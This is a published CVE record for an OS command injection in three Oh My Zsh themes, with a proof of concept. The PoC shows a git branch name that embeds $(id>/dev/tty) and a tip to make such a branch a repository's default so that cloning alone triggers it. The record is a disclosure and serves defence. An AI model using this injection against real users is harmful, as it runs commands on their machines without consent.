CVE-2021-3769 (GCVE-0-2021-3769)

Vulnerability from cvelistv5 – Published: 2021-11-30 09:30 – Updated: 2024-08-03 17:09
Title
OS Command Injection in ohmyzsh/ohmyzsh
Summary
# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes

**Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited.

**Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978).

**Impacted areas**:
- `pygmalion` theme.
- `pygmalion-virtualenv` theme.
- `refined` theme.
CWE
  • CWE-78 - OS Command Injection
Impacted products
Vendor    Product           Version
ohmyzsh   ohmyzsh/ohmyzsh   Affected: unspecified, < b3ba9978 (custom)

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T17:09:08.686Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "ohmyzsh/ohmyzsh",
          "vendor": "ohmyzsh",
          "versions": [
            {
              "lessThan": "b3ba9978",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `pygmalion`, `pygmalion-virtualenv` or `refined` themes.\n3. Create and `cd` into a new git repository: `git init bad-repo \u0026\u0026 cd bad-repo`.\n4. Create and switch to a new branch with a name containing either `$(\u003cinjected-command\u003e`, \u003ccode\u003e\\`\\\u003cinjected-command\\\u003e\\`\u003c/code\u003e or `${(e):-\"\u003cinjected-command\u003e\"}`:\n\n   ```sh\n   badbranch=\u0027feat/bad-branch$(id\u003e/dev/tty)\u0027\n   git checkout -b \"$badbranch\"\n   ```\n\n   In the `pygmalion` theme, the prompt changes changes from the default branch to:\n\n   ```console\n   user@host:~/exploit-poc|master \u21d2  badbranch=\u0027feat/bad-branch$(id\u003e/dev/tty)\u0027; git checkout -b \"$badbranch\"\n   Switched to a new branch \u0027feat/bad-branch$(id\u003e/dev/tty)\u0027\n   uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n   uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n   user@host:~/exploit-poc|feat/bad-branch \u21d2 \n   ```\n\n   A similar thing happens in `pygmalion-virtualenv` and `refined` themes.\n\nNOTE: for maximum impact, you can define the malicious branch name as the default branch name in GitHub, so that when a user clones it for the first time and enters the repository, the malicious branch is automatically checked out. That means that the user only needs to clone and enter the repository for the exploit to work.\n"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-78",
              "description": "CWE-78 OS Command Injection",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-11-30T09:30:18",
        "orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
        "shortName": "@huntrdev"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"
        }
      ],
      "title": "OS Command Injection in ohmyzsh/ohmyzsh",
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security@huntr.dev",
          "ID": "CVE-2021-3769",
          "STATE": "PUBLIC",
          "TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "ohmyzsh/ohmyzsh",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003c",
                            "version_value": "b3ba9978"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "ohmyzsh"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme."
            }
          ]
        },
        "exploit": [
          {
            "lang": "en",
            "value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `pygmalion`, `pygmalion-virtualenv` or `refined` themes.\n3. Create and `cd` into a new git repository: `git init bad-repo \u0026\u0026 cd bad-repo`.\n4. Create and switch to a new branch with a name containing either `$(\u003cinjected-command\u003e`, \u003ccode\u003e\\`\\\u003cinjected-command\\\u003e\\`\u003c/code\u003e or `${(e):-\"\u003cinjected-command\u003e\"}`:\n\n   ```sh\n   badbranch=\u0027feat/bad-branch$(id\u003e/dev/tty)\u0027\n   git checkout -b \"$badbranch\"\n   ```\n\n   In the `pygmalion` theme, the prompt changes changes from the default branch to:\n\n   ```console\n   user@host:~/exploit-poc|master \u21d2  badbranch=\u0027feat/bad-branch$(id\u003e/dev/tty)\u0027; git checkout -b \"$badbranch\"\n   Switched to a new branch \u0027feat/bad-branch$(id\u003e/dev/tty)\u0027\n   uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n   uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n   user@host:~/exploit-poc|feat/bad-branch \u21d2 \n   ```\n\n   A similar thing happens in `pygmalion-virtualenv` and `refined` themes.\n\nNOTE: for maximum impact, you can define the malicious branch name as the default branch name in GitHub, so that when a user clones it for the first time and enters the repository, the malicious branch is automatically checked out. That means that the user only needs to clone and enter the repository for the exploit to work.\n"
          }
        ],
        "impact": {
          "cvss": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-78 OS Command Injection"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978",
              "refsource": "MISC",
              "url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
    "assignerShortName": "@huntrdev",
    "cveId": "CVE-2021-3769",
    "datePublished": "2021-11-30T09:30:18",
    "dateReserved": "2021-09-05T00:00:00",
    "dateUpdated": "2024-08-03T17:09:08.686Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2021-3769\",\"sourceIdentifier\":\"security@huntr.dev\",\"published\":\"2021-11-30T10:15:09.000\",\"lastModified\":\"2024-11-21T06:22:22.900\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme.\"},{\"lang\":\"es\",\"value\":\"# Vulnerabilidad en los temas \\\"pygmalion\\\", \\\"pygmalion-virtualenv\\\" y \\\"refined\\\" **Descripci\u00f3n**: estos temas usan \\\"print -P\\\" en las cadenas proporcionadas por el usuario para imprimirlas en la terminal. Todos ellos lo hacen sobre la informaci\u00f3n de git, particularmente el nombre de la rama, por lo que si la rama presenta un nombre especialmente dise\u00f1ado la vulnerabilidad puede ser explotada. **Corregido en**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **\u00c1reas afectadas**: - Tema \\\"pygmalion\\\". - Tema \\\"pygmalion-virtualenv\\\". - Tema \\\"refined\\\"\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security@huntr.dev\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.6,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:C/I:C/A:C\",\"baseScore\":10.0,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"COMPLETE\",\"integrityImpact\":\"COMPLETE\",\"availabilityImpact\":\"COMPLETE\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":10.0,\"impactScore\":10.0,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"security@huntr.dev\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:planetargon:oh_my_zsh:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2021-11-11\",\"matchCriteriaId\":\"80FD5E81-3E73-4921-925C-E55098EAE4B1\"}]}]}],\"references\":[{\"url\":\"https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978\",\"source\":\"security@huntr.dev\",\"tags\":[\"Patch\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Third Party Advisory\"]}]}}"
  }
}

